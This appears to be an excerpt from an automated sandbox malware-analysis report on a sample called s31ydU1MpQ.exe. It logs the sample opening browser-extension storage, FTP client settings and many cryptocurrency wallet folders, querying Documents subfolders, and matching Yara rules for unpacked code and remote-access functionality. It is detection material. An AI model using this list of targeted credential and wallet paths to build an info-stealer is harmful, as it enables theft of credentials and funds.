Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Directory queried: number of queries: 1001
Source: Yara match File source: 0.3.s31ydU1MpQ.exe.12c3191.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.s31ydU1MpQ.exe.12c3191.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1415425762.000000000131C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1415661013.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1415818290.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1367343816.0000000001319000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1415450918.00000000012D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: s31ydU1MpQ.exe PID: 6440, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: s31ydU1MpQ.exe PID: 6440, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000B.00000003.1623078762.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1681988687.0000000000681000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BGXAMSUR4L24WR8IH77.exe PID: 484, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs